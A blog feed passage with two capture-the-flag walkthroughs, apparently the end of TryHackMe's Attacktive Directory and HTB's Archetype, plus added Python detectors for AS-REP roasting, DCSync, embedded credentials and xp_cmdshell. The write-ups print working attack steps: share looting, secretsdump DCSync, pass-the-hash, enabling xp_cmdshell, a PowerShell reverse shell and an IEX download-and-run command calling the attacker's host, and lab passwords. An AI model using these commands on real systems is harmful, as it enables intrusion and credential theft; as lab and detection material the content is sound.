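    """Flag 4768 (Kerberos TGT requested) events with Pre-Authentication
    Type 0 (none) and Ticket Encryption Type 0x17 (RC4, etype 23): the
    combination an AS-REP roasting request produces in the Security log."""
    flagged = []
    for ev in events:
        if ev.get("EventID") != 4768:
            continue
        if ev.get("PreAuthType") == 0 and ev.get("TicketEncryptionType") == 0x17:
            flagged.append((ev["TargetUserName"], ev["ClientAddress"]))
    return flagged


# Constructed sample records shaped like LDAP query results (not real
# directory data). Account names follow the post; the flag values are made up.
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "svc-admin",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH},
    {"sAMAccountName": "backup", "userAccountControl": UF_NORMAL_ACCOUNT},
    {"sAMAccountName": "administrator", "userAccountControl": UF_NORMAL_ACCOUNT},
    # Pre-auth off but the account itself is disabled: not roastable, so not reported.
    {"sAMAccountName": "old-svc",
     "userAccountControl": UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH | UF_ACCOUNTDISABLE},
]

# Constructed, simplified Security-log records. Keys are shortened forms of
# the "Pre-Authentication Type", "Ticket Encryption Type" and "Client Address"
# fields of event 4768; addresses are made up.
SAMPLE_EVENTS = [
    {"EventID": 4768, "TargetUserName": "svc-admin", "ClientAddress": "10.10.0.5",
     "PreAuthType": 0, "TicketEncryptionType": 0x17},
    # Ordinary logon: timestamp pre-auth (type 2) and an AES ticket (0x12).
    {"EventID": 4768, "TargetUserName": "backup", "ClientAddress": "10.10.0.7",
     "PreAuthType": 2, "TicketEncryptionType": 0x12},
    # A 4769 service-ticket event is not a TGT request and is skipped.
    {"EventID": 4769, "TargetUserName": "backup", "ClientAddress": "10.10.0.7"},
]

if __name__ == "__main__":
    print("accounts with pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
    print("TGT requests worth a look:", roastable_tgt_requests(SAMPLE_EVENTS))
```

The audit function is the one to run against a real directory export; the event filter is the shape of a detection rule, not a replacement for one.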

Task 6 - Enumeration Back to the Basics (DC Enumeration Pt. 3)

In the previous task, we cracked the password for a specific domain user. Now we use these user credentials to enumerate further. For that, let's look at the shares that we can access with the user credential on the domain controller. To do this, we can use the smbclient tool.

smbclient -L spookysec.local -U 'svc-admin'
                OR
smbclient -L 10.10.xx.xx -U 'svc-admin'
-U        -> Username
-L|--list -> This option allows you to look at what services are available on a server.

Here is the output 👇

Attacktive Directory on TryHackMe

So, let's discuss what exactly we are trying to do here. We are querying the target IP address with the recently collected username to find SMB shares. If any share is accessible, we look inside it for useful information, typically flags, passwords, or something similar. 🙂

There are 6 shares available! Among them, the share backup seems interesting. Let’s explore this. 🤠

smbclient //10.10.xxx.xxx/backup -U 'svc-admin'

Here is the output 👇

Attacktive Directory on TryHackMe
Attacktive Directory on TryHackMe
backup_credentials.txt

So, there’s a file, and it holds encoded credentials for one of the accounts. The string looks like base64 (an encoding, not encryption, so no key is needed to read it), so let’s decode it with the command below.

base64 --decode backup_credentials.txt

Here is the output 👇

Attacktive Directory on TryHackMe

Now, let’s answer the questions. 🔍

What utility can we use to map remote SMB shares?
smbclient
Which option will list shares?
-L
How many remote shares is the server listing?
6
There is one particular share that we have access to that contains a text file. Which share is it?
backup
What is the content of the file?
Ym_________________
Decoding the contents of the file, what is the full contents?
backup@spookysec.local:ba___________

Task 7 - Domain Privilege Escalation | Elevating Privileges within the Domain

Now that we have a new set of user credentials, we may have more privileges on the system than before. The username of the account, "backup", gets us thinking: what is this the backup account for? 🤔

Well, it is the backup account for the Domain Controller. This account has been granted replication rights, so every Active Directory change, password hashes included, can be synced to it just as it would be to another domain controller.

Knowing this, we are going to use another tool from Impacket's library, called secretsdump.py.

SecretsDump.py — It performs various techniques to dump secrets from the remote machine without executing any agent there. For SAM and LSA Secrets (including cached creds) we try to read as much as we can from the registry and then we save the hives in the target system (%SYSTEMROOT%\Temp directory) and read the rest of the data from there. For DIT files, we dump NTLM hashes, Plaintext credentials (if available) and Kerberos keys using the DL_DRSGetNCChanges() method. It can also dump NTDS.dit via vssadmin executed with the smbexec/wmiexec approach. The script initiates the services required for its working if they are not available (e.g. Remote Registry, even if it is disabled). After the work is done, things are restored to the original state.
cd /opt/impacket/examples
secretsdump.py -h 
-h, --help -> Show this help message and exit
-just-dc   -> Extract only NTDS.DIT data (NTLM hashes and Kerberos keys)
sudo secretsdump.py spookysec.local/backup:FOUNDPASSWORDHERE@10.10.xxx.xxx -just-dc-user Administrator
                   OR
sudo secretsdump.py -just-dc backup@10.10.xxx.xxx

As the commands above show, we run the script with sudo and the -just-dc flag, passing the domain account name that we previously collected from the SMB share. On execution it first asks for your Kali Linux (sudo) password and then for the target domain account's password.

Here is the output 👇

Attacktive Directory on TryHackMe

As you can see, we dumped the hashes of every account from the target domain controller. This worked because the account we used has the replication permission that lets all Active Directory changes, including password hashes, be synced to it.
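What secretsdump.py did here is a DCSync: it asked the domain controller, over DRSUAPI, to replicate directory changes to it, which is only possible because the backup account holds the replication control access rights. The following added example, not part of the room or this post, shows how a defender spots that from Windows Security event 4662 ("an operation was performed on an object"): any caller that is not a domain controller machine account exercising the DS-Replication-Get-Changes rights on the domain object. The log lines are constructed in a simplified key=value form, not real Windows telemetry; the `allowlist` parameter and the account names other than backup are assumptions of the example.

```python
# Added example (not from the post): detecting DCSync-style replication
# requests from Windows Security event 4662. The log lines are constructed
# in a simplified key=value form, not real Windows telemetry.

# Control access right GUIDs a DCSync (DRSUAPI GetNCChanges) caller needs.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100   # AccessMask bit for an extended (control access) right

SAMPLE_LOG = """\
EventID=4662 SubjectUserName=DC01$ SubjectDomainName=SPOOKYSEC ObjectType=domainDNS AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=backup SubjectDomainName=SPOOKYSEC ObjectType=domainDNS AccessMask=0x100 Properties=1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
EventID=4662 SubjectUserName=james SubjectDomainName=SPOOKYSEC ObjectType=user AccessMask=0x10 Properties=bf967aba-0de6-11d0-a285-00aa003049e2
EventID=4624 SubjectUserName=backup LogonType=3
"""


def parse_line(line):
    """key=value tokens separated by whitespace -> dict (constructed format)."""
    return dict(token.split("=", 1) for token in line.split())


def is_expected_replicator(user, allowlist=()):
    # Domain controller machine accounts (names ending in $) replicate with each
    # other all day; anything else asking for these rights deserves a look.
    return user.endswith("$") or user in allowlist


def dcsync_suspects(log_text, allowlist=()):
    """(DOMAIN\\user, [right names]) for every non-DC principal that exercised
    a replication control access right."""
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        if ev.get("EventID") != "4662":
            continue
        if int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS == 0:
            continue
        guids = ev.get("Properties", "").split(";")
        rights = [REPLICATION_RIGHTS[g] for g in guids if g in REPLICATION_RIGHTS]
        if not rights:
            continue
        user = ev["SubjectUserName"]
        if is_expected_replicator(user, allowlist):
            continue
        hits.append((f"{ev.get('SubjectDomainName', '?')}\\{user}", rights))
    return hits


if __name__ == "__main__":
    for principal, rights in dcsync_suspects(SAMPLE_LOG):
        print(f"possible DCSync by {principal}: {', '.join(rights)}")
```

Two caveats for using this for real: 4662 is only written if "Audit Directory Service Access" is enabled and the domain object's SACL audits control access, and some legitimate software (Azure AD Connect, some backup agents) holds these rights by design, which is what the allowlist is for. The better control is to audit who holds the rights in the first place, since an account like backup should never have them.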

Now that we have the NTLM hash of the domain Administrator account, we can either try to crack it to recover the password, or use the "pass the hash" technique to access the machine with the Evil-WinRM application. Alternatively, Impacket's psexec.py can use the Administrator's full hash to create a shell.

Let's do this using the Evil-WinRM application. Type the following command to install it.

Evil WinRM is the ultimate WinRM shell for hacking/pentesting. WinRM (Windows Remote Management) is the Microsoft implementation of WS-Management Protocol. A standard SOAP based protocol that allows hardware and operating systems from different vendors to interoperate. Microsoft included it in their Operating Systems in order to make life easier to system administrators.
sudo gem install evil-winrm

#After installation type:
evil-winrm
-H, --hash      -> HASH NTHash
-i, --ip IP     -> Remote host IP or hostname
-u, --user USER -> Username 

Now, let’s answer the questions. 🔍

What method allowed us to dump NTDS.DIT?
DRSUAPI
What is the Administrators NTLM hash?
xxxxxxxxxxxxxxxxxxxx
What method of attack could allow us to authenticate as the user without the password?
Pass The Hash
Using a tool called Evil-WinRM what option will allow us to use a hash?
-H

Task 8 - Getting the flags

At this stage, we can use Evil-WinRM or Impacket's psexec.py to get a shell on the target machine by passing the hash.

evil-winrm -i 10.10.xxx.xxx -u Administrator -H TheFoundHash
#TheFoundHash -> 0e***********************fc

Here is the output 👇

Attacktive Directory on TryHackMe

Now we are logged in as the Administrator. Each flag can be found in the respective user’s Desktop directory. 😈

cd ../../Administrator/Desktop
dir
cat root.txt
cd ../../svc-admin/Desktop
dir
cat user.txt.txt
cd ../../backup/Desktop
dir
cat PrivEsc.txt

Here is the output 👇

Attacktive Directory on TryHackMe

Okay... I’ll see you on the next room! 🙋‍♂️

Thanks for reading this post, if you like my work you can support by buying me a coffee. ☕️


References:
Active Directory Replication over Firewalls | Microsoft
Kerberos: The Network Authentication Protocol | MIT
Active Directory Ports | InfoSec Handlers Diary Blog
Active Directory - Definition | Tech Terms

]]>
<![CDATA[Archetype Walkthrough]]>https://shehansanjula.github.io/blog/archetype-walkthrough-htb/63c3a82da4552e005506103eFri, 16 Jul 2021 12:31:34 GMTArchetype Walkthrough

Before starting, I'm going to assume the reader already has a HackTheBox account and at least some familiarity with cybersecurity topics. But don't worry, I will try to cover every fundamental security concept associated with the Archetype box. 🙂

Here I will begin with the Archetype machine, the first machine of the "Starting Point" machine series offered by HackTheBox.

Archetype Walkthrough
Starting Point machine series

Basically, it is a series of 9 machines rated "Very Easy" that should be rooted in sequence. It’s a good starting point to learn the basics of CTF, along with some knowledge of SMB, Linux and Windows. Here you can see my process of learning how to solve this box.

HackTheBox (HTB) will provide you with official walkthroughs for each of the 9 machines. So from my perspective, it's fine to read each and every walkthrough provided by HTB and others to understand and learn new things by yourself. "Walkthroughs are the teachers" by the way.

Archetype Walkthrough
Official Archetype walkthrough - HTB

Enough talks 🥱, let's get started to hack. 🐱‍💻

Disclaimers: No flags (user/root) are shown in this writeup (as usual in writeups), so follow the procedures to grab the flags! 🐱‍👤

00. Configure the VPN ...

Log in to HackTheBox. Navigate to the top-right of the website and you'll see the "Connect to HTB" tab. Do the configuration as you prefer, or keep the defaults as they are.
Download the .ovpn file from Starting Point menu.

Archetype Walkthrough
Downloading the .ovpn file

To begin, let's create our OpenVPN session.

sudo openvpn starting_point_ACCOUNTNAME.ovpn

After running this command, you'll get an output like below. It means that you have successfully connected to HTB through the VPN connection. You can verify it by navigating to the HTB account as well.

Archetype Walkthrough
successfully connected to HTB (Starting point server)

Now once connected, let's find out our new VPN interface. For that, run the "ip a" command on the terminal.

Archetype Walkthrough
ip a (output)

We can see that our "tun0" interface is our current VPN interface, connecting us directly to the Starting Point server. In a real-world scenario, however, we would have to perform range-based Nmap scans or some OSINT (open-source intelligence) to find the IP address of a target machine or network.


01. Start the Machine ...

To start the machine, just click on "Join Machine".

Archetype Walkthrough

Then you can see the IP address of that machine. 🤠

Archetype Walkthrough

Before continuing to the enumeration steps, it's best practice to make sure the VPN is connected and the machine is alive by sending a few "ping" requests to the IP address of our target. Sometimes a machine, or a firewall in front of it, drops ping requests, but in most cases ping will succeed! 🙂

Archetype Walkthrough

The ping reply shows TTL=127. Windows starts with a TTL of 128, so the hop count is 1 and the host is very likely a Windows machine. It means there is one route between the machine and us (the VPN).

To check the hop count to 10.10.10.27, you can use the following command. 😉

traceroute 10.10.10.27
In general, routers do not just set the TTL to whatever they want. They usually decrement the TTL by 1. A host sets a TTL at a reasonable number that should be the most hops a packet would ever take to another host, and at every hop, the TTL decrements by 1. When a packet expires on a routing platform because its TTL reaches 0, it is required to send an “ICMP TTL Exceeded message” back to the sender. The reason for the TTL is to prevent infinite loops caused by bad routing.

Default TTL values of different OS

  • TTL = 64 : Unix/ Linux
  • TTL = 128 : Windows
  • TTL = 254 : Solaris/ AIX
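The reasoning above (reply TTL = initial TTL minus hops, and the initial TTL hints at the OS family) generalises to any observed TTL, not only the 127 seen here. The following added example, not part of the walkthrough, pulls the TTL out of ping output and turns it into an OS guess plus a hop count using exactly the default-TTL table listed above. The ping transcript is constructed; the two function names are the example's own. Note the caveat the post does not spell out: the initial TTL is configurable on every OS, so this is a fingerprinting heuristic, not proof.

```python
# Added example (not from the walkthrough): OS family and hop count from an
# observed ICMP reply TTL, using the default-TTL table given above.
import re

# Initial TTL values from the post; a reply's TTL is (initial - hops traversed).
DEFAULT_TTLS = {64: "Unix/Linux", 128: "Windows", 254: "Solaris/AIX"}


def infer_from_ttl(observed):
    """Return (os_family, hops) for an observed TTL.

    Picks the smallest default initial TTL that is >= the observed value: a
    reply of 127 can only have come from a 128 start one hop away (a 64 start
    could never produce 127). Returns ("unknown", None) if no table entry fits.
    """
    if not 0 < observed <= 255:
        raise ValueError("TTL must be in 1..255")
    for initial in sorted(DEFAULT_TTLS):
        if observed <= initial:
            return DEFAULT_TTLS[initial], initial - observed
    return "unknown", None


def parse_ping_ttl(ping_output):
    """All ttl=N values in ping output (Linux prints 'ttl=', Windows 'TTL=')."""
    return [int(n) for n in re.findall(r"\bttl=(\d+)", ping_output, flags=re.IGNORECASE)]


def classify_ping(ping_output):
    """Summarise a ping run: most common TTL, inferred OS family and hop count."""
    ttls = parse_ping_ttl(ping_output)
    if not ttls:
        return None
    ttl = max(set(ttls), key=ttls.count)   # majority value survives one odd reply
    family, hops = infer_from_ttl(ttl)
    return {"ttl": ttl, "os_family": family, "hops": hops}


# Constructed ping transcript, shaped like the output from a Linux host.
SAMPLE_PING = """\
PING 10.10.10.27 (10.10.10.27) 56(84) bytes of data.
64 bytes from 10.10.10.27: icmp_seq=1 ttl=127 time=283 ms
64 bytes from 10.10.10.27: icmp_seq=2 ttl=127 time=281 ms
"""

if __name__ == "__main__":
    print(classify_ping(SAMPLE_PING))   # {'ttl': 127, 'os_family': 'Windows', 'hops': 1}
```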

02. Let's start with enumeration first...

02.1 Run Nmap Scan

First, we need to check the open ports on this machine. We can use the Nmap scripting engine to do a check for these. I use the command nmap -sC -sV -oA nmap.archetype 10.10.10.27, and I got quite a few ports open!

nmap -sC -sV -oA nmap.archetype 10.10.10.27
-sV : Service and version fingerprinting
-sC : Launch the default NSE Nmap scripts
-oA : Output in all three formats (normal, grepable and XML) using the given base filename

Here is the output 👇

Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-15 02:02 EDT
Nmap scan report for 10.10.10.27
Host is up (0.28s latency).
Not shown: 996 closed ports
PORT     STATE SERVICE      VERSION
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp  open  microsoft-ds Windows Server 2019 Standard 17763 microsoft-ds
1433/tcp open  ms-sql-s     Microsoft SQL Server 2017 14.00.1000.00; RTM
| ms-sql-ntlm-info: 
|   Target_Name: ARCHETYPE
|   NetBIOS_Domain_Name: ARCHETYPE
|   NetBIOS_Computer_Name: ARCHETYPE
|   DNS_Domain_Name: Archetype
|   DNS_Computer_Name: Archetype
|_  Product_Version: 10.0.17763
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2021-07-15T04:06:19
|_Not valid after:  2051-07-15T04:06:19
|_ssl-date: 2021-07-15T06:27:32+00:00; +23m39s from scanner time.
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 1h47m40s, deviation: 3h07m51s, median: 23m39s
| ms-sql-info: 
|   10.10.10.27:1433: 
|     Version: 
|       name: Microsoft SQL Server 2017 RTM
|       number: 14.00.1000.00
|       Product: Microsoft SQL Server 2017
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| smb-os-discovery: 
|   OS: Windows Server 2019 Standard 17763 (Windows Server 2019 Standard 6.3)
|   Computer name: Archetype                                                                                         
|   NetBIOS computer name: ARCHETYPE\x00
|   Workgroup: WORKGROUP\x00
|_  System time: 2021-07-14T23:27:19-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2021-07-15T06:27:21
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.73 seconds

Now we know the OS is Windows, running Microsoft SQL Server 2017 RTM on port 1433, and that the SMB port (445) is open too. Let's enumerate further. Remember, enumeration is the key! 🔑

02.2 List available shares

Further, we can notice that ports 445 and 1433 are open, and they are associated with file sharing (SMB) and Microsoft SQL Server. Since file shares often hold configuration files containing passwords or other sensitive information, let's check that first! Here I've used smbclient to list the available shares as an anonymous user.

sudo smbclient -N -L 10.10.10.27
-N	: Don't ask for a password
-L	: Get a list of shares available on a host

Here is the output 👇

Archetype Walkthrough

Look what we got here! Yeah, that's something interesting, right? It seems like there is a share called 'backups' that is accessible with no passwords. So let's try to access it and see what's inside.😎😋

smbclient -N \\\\10.10.10.27\\backups\\

Now we end up in the SMB shell, and there is a file called prod.dtsConfig, so let's download it.

Archetype Walkthrough
smb: \> dir              : List all files and directories
smb: \> get <file-name>  : Download a file
smb: \> more <file-name> : View a text file

Now open prod.dtsConfig: the file contains a SQL connection string with credentials for the local Windows user ARCHETYPE\sql_svc 🥂.
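A .dtsConfig file is an SSIS package configuration: plain XML where each Configuration element carries a property path and its value, and a connection-string value is where a password ends up. The following added example, not part of the walkthrough, is the check a defender would run over such files before they land on a share: parse the XML, split every value that looks like a connection string, and report ones that carry a plaintext password (plus Persist Security Info=True, which lets the password be read back from an open connection). The XML below is constructed to follow that layout with a placeholder password; it is not the real prod.dtsConfig.

```python
# Added example (not from the walkthrough): scanning an SSIS .dtsConfig file for
# embedded credentials. The XML is constructed with a placeholder password.
import xml.etree.ElementTree as ET

SAMPLE_DTSCONFIG = """<?xml version="1.0"?>
<DTSConfiguration>
  <DTSConfigurationHeading>
    <DTSConfigurationFileInfo GeneratedBy="ARCHETYPE\\sql_svc" GeneratedFromPackageName="Package" GeneratedDate="CONSTRUCTED"/>
  </DTSConfigurationHeading>
  <Configuration ConfiguredType="Property" Path="\\Package.Connections[Destination].Properties[ConnectionString]" ValueType="String">
    <ConfiguredValue>Data Source=.;Password=CONSTRUCTED_PASSWORD;User ID=ARCHETYPE\\sql_svc;Initial Catalog=Catalog;Provider=SQLNCLI10.1;Persist Security Info=True;Auto Translate=False;</ConfiguredValue>
  </Configuration>
  <Configuration ConfiguredType="Property" Path="\\Package.Variables[User::BatchSize].Properties[Value]" ValueType="Int32">
    <ConfiguredValue>500</ConfiguredValue>
  </Configuration>
</DTSConfiguration>
"""

SECRET_KEYS = {"password", "pwd"}
USER_KEYS = ("user id", "uid", "user")


def parse_connection_string(value):
    """Split 'Key=Value;Key=Value' into a dict with lower-cased keys."""
    pairs = {}
    for part in value.split(";"):
        if "=" in part:
            key, val = part.split("=", 1)
            pairs[key.strip().lower()] = val.strip()
    return pairs


def redact(value):
    """Same connection string with every password-bearing value replaced by ***."""
    parts = []
    for part in value.split(";"):
        key = part.split("=", 1)[0]
        if "=" in part and key.strip().lower() in SECRET_KEYS:
            parts.append(key + "=***")
        else:
            parts.append(part)
    return ";".join(parts)


def find_embedded_credentials(xml_text):
    """One finding per Configuration value that carries a plaintext secret."""
    findings = []
    root = ET.fromstring(xml_text)
    for conf in root.iter("Configuration"):
        node = conf.find("ConfiguredValue")
        if node is None or not node.text:
            continue
        cs = parse_connection_string(node.text)
        secrets = sorted(k for k in cs if k in SECRET_KEYS and cs[k])
        if not secrets:
            continue   # numeric or non-connection values such as the batch size
        user = next((cs[k] for k in USER_KEYS if k in cs), None)
        issues = [f"plaintext {k} in connection string" for k in secrets]
        if cs.get("persist security info", "").lower() == "true":
            issues.append("Persist Security Info=True keeps the password readable from the open connection")
        findings.append({
            "path": conf.get("Path"),
            "user": user,
            "issues": issues,
            "redacted": redact(node.text),   # safe to put in a ticket or log
        })
    return findings


if __name__ == "__main__":
    for f in find_embedded_credentials(SAMPLE_DTSCONFIG):
        print(f["path"], "->", f["user"], "|", "; ".join(f["issues"]))
```

The fix on the SQL Server side is Integrated Security (Windows authentication for the service account) or an SSIS package configuration that pulls the connection string from a protected store, so that nothing on an anonymous-readable share ever contains Password=.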

Archetype Walkthrough

03. Lets get Foothold...

Now that we have credentials, let’s try connecting to the SQL Server using Impacket’s mssqlclient.py.

Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch, as well as parsed from raw data, and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library. source: https://github.com/SecureAuthCorp/impacket

03.1 Download and use mssqlclient.py

First, we need to simply wget and download the mssqlclient.py script.

wget https://raw.githubusercontent.com/SecureAuthCorp/impacket/master/examples/mssqlclient.py

And then run the script and check whether we are working as a sysadmin (privileged user) or not.

python3 mssqlclient.py ARCHETYPE/sql_svc:M3g4c0rp123@10.10.10.27 -windows-auth
Note: To run the above python script successfully, you need to install the latest "Impacket" version on your Kali machine.

Now we can use the IS_SRVROLEMEMBER function to check whether the current SQL user has sysadmin (highest level) privileges on the SQL Server.

Archetype Walkthrough

The return value 1 means the login is a member of the role, so yes, we have the highest privileges. 😁
This will allow us to enable xp_cmdshell and gain RCE on the host.

Check the awesome blog posts below to understand that trick.

03.2 Usage of  xp_cmdshell

Now, we can get to the xp_cmdshell, by running the below commands.

EXEC sp_configure 'Show Advanced Options', 1; 
reconfigure; 
sp_configure; 
EXEC sp_configure 'xp_cmdshell', 1 
reconfigure;
xp_cmdshell "whoami"
xp_cmdshell "systeminfo"

The whoami output shows that the SQL Server service is also running in the context of the user ARCHETYPE\sql_svc.

The systeminfo command gives us a long list of interesting information about the system.
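Every step of the sp_configure sequence above leaves a trace: SQL Server writes a line to its ERRORLOG each time a configuration option changes, naming the option, the old and new value and the session (spid) that did it. The following added example, not part of the walkthrough, is a detector over those lines that raises the enabling of xp_cmdshell and a few other options that give a sysadmin login OS-level execution. The ERRORLOG lines are constructed to follow the message format SQL Server uses for sp_configure changes; the list of high-risk options is the example's own choice.

```python
# Added example (not from the walkthrough): spotting xp_cmdshell and similar
# options being switched on, from SQL Server ERRORLOG lines. The log lines
# are constructed to follow SQL Server's sp_configure change message.
import re

# sp_configure options that give a sysadmin login OS-level or out-of-process
# execution; the watchlist is this example's own choice.
HIGH_RISK_OPTIONS = {
    "xp_cmdshell",
    "Ole Automation Procedures",
    "clr enabled",
    "Ad Hoc Distributed Queries",
}

CONFIG_CHANGE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)

SAMPLE_ERRORLOG = """\
2021-07-15 02:09:58.10 Server      Server process ID is 1234.
2021-07-15 02:10:11.22 spid55      Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-07-15 02:10:12.01 spid55      Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
2021-07-15 02:10:40.77 spid55      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2021-07-15 02:11:02.30 spid61      Configuration option 'max server memory (MB)' changed from 2147483647 to 4096. Run the RECONFIGURE statement to install.
"""


def config_changes(log_text):
    """Every sp_configure change in the log as a dict (ts, spid, option, old, new)."""
    changes = []
    for line in log_text.splitlines():
        m = CONFIG_CHANGE.match(line)
        if m:
            change = m.groupdict()
            change["old"], change["new"] = int(change["old"]), int(change["new"])
            changes.append(change)
    return changes


def risky_enables(log_text):
    """Changes that turn a high-risk option on (new value != 0). The spid and
    timestamp let the session be matched to a login in the same log."""
    return [c for c in config_changes(log_text)
            if c["option"] in HIGH_RISK_OPTIONS and c["new"] != 0]


def sessions_with_advanced_options(log_text):
    """spids that flipped 'show advanced options' on, the prerequisite step in
    the command sequence above; useful as low-severity context."""
    return sorted({c["spid"] for c in config_changes(log_text)
                   if c["option"] == "show advanced options" and c["new"] != 0})


if __name__ == "__main__":
    for c in risky_enables(SAMPLE_ERRORLOG):
        print(f"{c['ts']} {c['spid']} enabled {c['option']} ({c['old']} -> {c['new']})")
    print("sessions that showed advanced options:", sessions_with_advanced_options(SAMPLE_ERRORLOG))
```

Note that the later 'changed from 1 to 0' line is not flagged: the attacker (or an admin) turning the option back off is still interesting, but the enable is the alert, and the quick on/off pair within one spid is itself a tell that someone wanted a shell rather than a permanent change.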

Archetype Walkthrough

Now that we can run system commands using xp_cmdshell, why can't we get a proper shell? 🤠

Hmmmmm...Ah! what a nice smell for PowerShell Reverse Shell huh! 😍

You can get some idea about reverse shells from the links below.

But personally, I like to use Nishang's Invoke-PowerShellTcpOneLine.ps1 to create my rev-shell.

After deleting all comments and unwanted things, the PowerShell script will be like this. 👇

$client = New-Object System.Net.Sockets.TCPClient('YourIP',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

$sm=(New-Object Net.Sockets.TCPClient('YourIP',443)).GetStream();[byte[]]$bt=0..65535|%{0};while(($i=$sm.Read($bt,0,$bt.Length)) -ne 0){;$d=(New-Object Text.ASCIIEncoding).GetString($bt,0,$i);$st=([text.encoding]::ASCII).GetBytes((iex $d 2>&1));$sm.Write($st,0,$st.Length)}
Remember: run ifconfig tun0 and replace YourIP with your tun0 address.

03.3 Get Reverse Shell

Now, it's time to get a reverse shell. Save above PowerShell script as anyname.ps1 (here, I saved it as Invoke-PowerShellTcpOneLine.ps1)

Now we need to make this PowerShell script executable. Open a new terminal window, then run the following command:

sudo chmod +x Invoke-PowerShellTcpOneLine.ps1

Let's now set up a local web server to "share" this script with our target. We also need to set up a netcat listener. First, run the following Python command within the same directory where the PowerShell script is located.

sudo python3 -m http.server 80

To listen for the connection, I always use the Swiss army knife (netcat) tool. Personally, I do not like to get a shell through the multi handler (Metasploit). Trust me, using the netcat tool you can learn a lot of things beyond Metasploit. 👽

In another terminal window:

sudo nc -lvnp 443

After all of this is set up, let's first set a firewall rule to allow callbacks from 10.10.10.27 to our machine via ports 80 & 443 (you can specify any port you are using for the creation of your reverse TCP shell).

For this lab, I decided to install & use ufw (Uncomplicated Firewall) for my firewall.

sudo apt install -y ufw
sudo ufw enable
sudo ufw allow from 10.10.10.27 proto tcp to any port 80,443
sudo ufw status numbered

After configuring the ufw, here is a snippet of the result:

Archetype Walkthrough

Let's verify we have a local web page running by opening up your web browser & typing localhost:80 in the URL search bar.

Archetype Walkthrough

04. Exploit the target …

With everything set, let's run the following command on the SQL server to download our backdoor & create our reverse TCP shell:

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://YourIP/Invoke-PowerShellTcpOneLine.ps1\");""
Remember to replace the YourIP field accordingly.

It should run successfully. The output of our Python HTTP server should show an HTTP 200 response code, indicating a successful download of our PowerShell script.

Archetype Walkthrough

We can see our foothold on the netcat terminal window.

Archetype Walkthrough

I divided up my terminal into 3 parts.

Archetype Walkthrough

Woooh!!! We got our shell. 💀 A shell is received as sql_svc.

Now that we are in the target windows system, let's go to the User directory and go inside the sql_svc user's directory. We'll see if we can find the first flag.

Hint: To see the contents of a text file from a Windows command prompt, just use the "type" command.
Archetype Walkthrough

Hopefully, you have acquired the first flag! 🤠


05. Privilege Escalation …

Now we need to escalate to Administrative privileges on our target Windows-based machine. To escalate privileges, we can run different tools.  Before running any tool, there are some steps that you need to run to enumerate some information, by the way. I will be showing you one by one in each walkthrough.

Remember, we are now in a service account called sql_svc. It's good practice to check recently accessed files and executed commands (keep that in mind as a habit). By default, the PowerShell console history is saved in

C:\Users\<account_name>\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt. Now you understand what our next step is.

Right, Let's check above file using type command. 🙂

type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt

Here is the output 👇

Archetype Walkthrough

Oh no, no, no, no... You see? Just like that, we have found the credentials for the user administrator.

The backup share is mapped with the administrator's credentials. Now, to "root" this machine, we will use another useful script from SecureAuthCorp.
If you see something like this, you are ready to launch Impacket's psexec.py script.

python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator:MEGACORP_4dm1n\!\!@10.10.10.27

Here is the output 👇

Archetype Walkthrough

Finally, we have Administrator Privileges. 👌 Now we can access the flag on the administrator desktop.
